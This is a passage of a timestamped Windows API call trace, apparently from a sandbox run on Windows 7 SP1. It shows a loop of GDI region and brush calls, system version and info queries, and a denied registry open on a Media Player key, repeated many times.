CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x760401d3 [0088.319] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x740401d6 [0088.319] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e5 [0088.319] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e6 [0088.319] CombineRgn (hrgnDst=0x10414e5, hrgnSrc1=0x760401d3, hrgnSrc2=0x740401d6, iMode=1) returned 1 [0088.319] CombineRgn (hrgnDst=0x10414e6, hrgnSrc1=0x760401d3, hrgnSrc2=0x740401d6, iMode=4) returned 2 [0088.319] CreateSolidBrush (color=0xff) returned 0x21014e4 [0088.319] CreateSolidBrush (color=0xff0000) returned 0x11014e7 [0088.319] DeleteObject (ho=0x11014e7) returned 1 [0088.319] DeleteObject (ho=0x740401d6) returned 1 [0088.319] DeleteObject (ho=0x760401d3) returned 1 [0088.319] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.319] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.319] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.319] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.319] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.319] BeginPath (hdc=0x0) returned 0 [0088.319] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.319] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.319] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.319] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.319] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.319] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.320] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.320] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.320] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x750401d6 [0088.320] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x770401d3 [0088.320] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e8 [0088.320] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e9 [0088.320] CombineRgn (hrgnDst=0x10414e8, hrgnSrc1=0x750401d6, hrgnSrc2=0x770401d3, iMode=1) returned 1 [0088.320] CombineRgn (hrgnDst=0x10414e9, hrgnSrc1=0x750401d6, hrgnSrc2=0x770401d3, iMode=4) returned 2 [0088.320] CreateSolidBrush (color=0xff) returned 0x21014e7 [0088.320] CreateSolidBrush (color=0xff0000) returned 0x11014ea [0088.320] DeleteObject (ho=0x11014ea) returned 1 [0088.320] DeleteObject (ho=0x770401d3) returned 1 [0088.320] DeleteObject (ho=0x750401d6) returned 1 [0088.320] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.320] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.320] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.320] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.320] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.320] BeginPath (hdc=0x0) returned 0 [0088.320] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.320] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.320] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.320] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.320] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.320] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.320] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.320] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.321] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x780401d3 [0088.321] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x760401d6 [0088.321] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414eb [0088.321] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414ec [0088.321] CombineRgn (hrgnDst=0x10414eb, hrgnSrc1=0x780401d3, hrgnSrc2=0x760401d6, iMode=1) returned 1 [0088.321] CombineRgn (hrgnDst=0x10414ec, hrgnSrc1=0x780401d3, hrgnSrc2=0x760401d6, iMode=4) returned 2 [0088.321] CreateSolidBrush (color=0xff) returned 0x21014ea [0088.321] CreateSolidBrush (color=0xff0000) returned 0x11014ed [0088.321] DeleteObject (ho=0x11014ed) returned 1 [0088.321] DeleteObject (ho=0x760401d6) returned 1 [0088.321] DeleteObject (ho=0x780401d3) returned 1 [0088.321] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.321] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.321] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.321] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.321] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.321] BeginPath (hdc=0x0) returned 0 [0088.321] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.321] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.321] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.321] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.321] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.321] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.321] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.321] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.321] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x770401d6 [0088.321] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x790401d3 [0088.321] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414ee [0088.321] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414ef [0088.321] CombineRgn (hrgnDst=0x10414ee, hrgnSrc1=0x770401d6, hrgnSrc2=0x790401d3, iMode=1) returned 1 [0088.321] CombineRgn (hrgnDst=0x10414ef, hrgnSrc1=0x770401d6, hrgnSrc2=0x790401d3, iMode=4) returned 2 [0088.321] CreateSolidBrush (color=0xff) returned 0x21014ed [0088.322] CreateSolidBrush (color=0xff0000) returned 0x11014f0 [0088.322] DeleteObject (ho=0x11014f0) returned 1 [0088.322] DeleteObject (ho=0x790401d3) returned 1 [0088.322] DeleteObject (ho=0x770401d6) returned 1 [0088.322] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.322] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.322] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.322] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.322] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.322] BeginPath (hdc=0x0) returned 0 [0088.322] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.322] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.322] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.322] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.322] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.322] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.322] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.322] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.322] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a0401d3 [0088.322] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x780401d6 [0088.322] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414f1 [0088.322] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414f2 [0088.322] CombineRgn (hrgnDst=0x10414f1, hrgnSrc1=0x7a0401d3, hrgnSrc2=0x780401d6, iMode=1) returned 1 [0088.322] CombineRgn (hrgnDst=0x10414f2, hrgnSrc1=0x7a0401d3, hrgnSrc2=0x780401d6, iMode=4) returned 2 [0088.322] CreateSolidBrush (color=0xff) returned 0x21014f0 [0088.322] CreateSolidBrush (color=0xff0000) returned 0x11014f3 [0088.322] DeleteObject (ho=0x11014f3) returned 1 [0088.322] DeleteObject (ho=0x780401d6) returned 1 [0088.322] DeleteObject (ho=0x7a0401d3) returned 1 [0088.322] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.322] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.323] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.323] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.323] BeginPath (hdc=0x0) returned 0 [0088.323] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.323] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.323] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.323] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.323] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.323] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.323] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.323] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x790401d6 [0088.323] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b0401d3 [0088.323] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414f4 [0088.323] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414f5 [0088.323] CombineRgn (hrgnDst=0x10414f4, hrgnSrc1=0x790401d6, hrgnSrc2=0x7b0401d3, iMode=1) returned 1 [0088.323] CombineRgn (hrgnDst=0x10414f5, hrgnSrc1=0x790401d6, hrgnSrc2=0x7b0401d3, iMode=4) returned 2 [0088.323] CreateSolidBrush (color=0xff) returned 0x21014f3 [0088.323] CreateSolidBrush (color=0xff0000) returned 0x11014f6 [0088.323] DeleteObject (ho=0x11014f6) returned 1 [0088.323] DeleteObject (ho=0x7b0401d3) returned 1 [0088.323] DeleteObject (ho=0x790401d6) returned 1 [0088.323] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.323] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.323] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.323] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.323] BeginPath (hdc=0x0) returned 0 [0088.323] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.323] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.324] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.324] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.324] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.324] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.324] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.324] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c0401d3 [0088.324] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a0401d6 [0088.324] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414f7 [0088.324] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414f8 [0088.324] CombineRgn (hrgnDst=0x10414f7, hrgnSrc1=0x7c0401d3, hrgnSrc2=0x7a0401d6, iMode=1) returned 1 [0088.324] CombineRgn (hrgnDst=0x10414f8, hrgnSrc1=0x7c0401d3, hrgnSrc2=0x7a0401d6, iMode=4) returned 2 [0088.324] CreateSolidBrush (color=0xff) returned 0x21014f6 [0088.324] CreateSolidBrush (color=0xff0000) returned 0x11014f9 [0088.324] DeleteObject (ho=0x11014f9) returned 1 [0088.324] DeleteObject (ho=0x7a0401d6) returned 1 [0088.324] DeleteObject (ho=0x7c0401d3) returned 1 [0088.324] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.324] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.324] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.324] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.324] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.324] BeginPath (hdc=0x0) returned 0 [0088.324] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.324] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.324] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.324] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.324] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.324] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.324] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.325] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b0401d6 [0088.325] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d0401d3 [0088.325] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414fa [0088.325] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414fb [0088.325] CombineRgn (hrgnDst=0x10414fa, hrgnSrc1=0x7b0401d6, hrgnSrc2=0x7d0401d3, iMode=1) returned 1 [0088.325] CombineRgn (hrgnDst=0x10414fb, hrgnSrc1=0x7b0401d6, hrgnSrc2=0x7d0401d3, iMode=4) returned 2 [0088.325] CreateSolidBrush (color=0xff) returned 0x21014f9 [0088.325] CreateSolidBrush (color=0xff0000) returned 0x11014fc [0088.325] DeleteObject (ho=0x11014fc) returned 1 [0088.325] DeleteObject (ho=0x7d0401d3) returned 1 [0088.325] DeleteObject (ho=0x7b0401d6) returned 1 [0088.325] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.325] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.325] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.325] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.325] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.325] BeginPath (hdc=0x0) returned 0 [0088.325] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.325] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.325] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.325] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.325] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.325] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.325] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.325] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e0401d3 [0088.325] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c0401d6 [0088.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414fd [0088.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414fe [0088.326] CombineRgn (hrgnDst=0x10414fd, hrgnSrc1=0x7e0401d3, hrgnSrc2=0x7c0401d6, iMode=1) returned 1 [0088.326] CombineRgn (hrgnDst=0x10414fe, hrgnSrc1=0x7e0401d3, hrgnSrc2=0x7c0401d6, iMode=4) returned 2 [0088.326] CreateSolidBrush (color=0xff) returned 0x21014fc [0088.326] CreateSolidBrush (color=0xff0000) returned 0x11014ff [0088.326] DeleteObject (ho=0x11014ff) returned 1 [0088.326] DeleteObject (ho=0x7c0401d6) returned 1 [0088.326] DeleteObject (ho=0x7e0401d3) returned 1 [0088.326] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.326] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.326] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.326] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.326] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.326] BeginPath (hdc=0x0) returned 0 [0088.326] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.326] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.326] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.326] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.326] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.326] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.326] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.326] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.326] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d0401d6 [0088.326] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f0401d3 [0088.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041500 [0088.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041501 [0088.326] CombineRgn (hrgnDst=0x1041500, hrgnSrc1=0x7d0401d6, hrgnSrc2=0x7f0401d3, iMode=1) returned 1 [0088.326] CombineRgn (hrgnDst=0x1041501, hrgnSrc1=0x7d0401d6, hrgnSrc2=0x7f0401d3, iMode=4) returned 2 [0088.326] CreateSolidBrush (color=0xff) returned 0x21014ff [0088.326] CreateSolidBrush (color=0xff0000) returned 0x1101502 [0088.326] DeleteObject (ho=0x1101502) returned 1 [0088.326] DeleteObject (ho=0x7f0401d3) returned 1 [0088.327] DeleteObject (ho=0x7d0401d6) returned 1 [0088.327] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, 